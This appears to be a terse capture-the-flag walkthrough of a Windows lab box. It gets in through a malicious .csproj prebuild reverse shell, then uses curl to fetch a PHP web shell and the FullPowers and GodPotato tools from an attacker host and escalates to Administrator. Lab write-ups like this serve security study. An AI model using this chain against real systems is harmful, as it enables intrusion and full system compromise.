80
echo '[ip] visual.htb' >> /etc/hosts
only 80 port opens
TEST LOCAL .git URL BY netcat
Found a Prebuild feature on google
setting up gitea requires time, i’m gonna use python’s http server to share git repo
“.csproj” prebuild file
find a ps1 reverse shell from google, make it as shell.ps1
shell.ps1
git init git add . git commit -m 'project_name' cd .git git --bare update-server-info
python3 -m http.server
then start listening 6666 port to receive reverse shell
got the initial access
whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
upload a reverse shell to a accessible path, to switch to local service account
curl http://10.10.16.12:8000/shell.php -o C:\xampp\htdocs\uploads\shell.php
git clone https://github.com/itm4n/FullPowers.git
curl http://10.10.16.12:8000/FullPowers.exe -o fp.exe
fp.exe
whoami /priv
curl http://10.10.16.12:8000/GodPotato-NET4.exe -o C:\xampp\htdocs\uploads\God.exe
God.exe -cmd "cmd /c whoami"
God.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\root.txt"
get the root flag!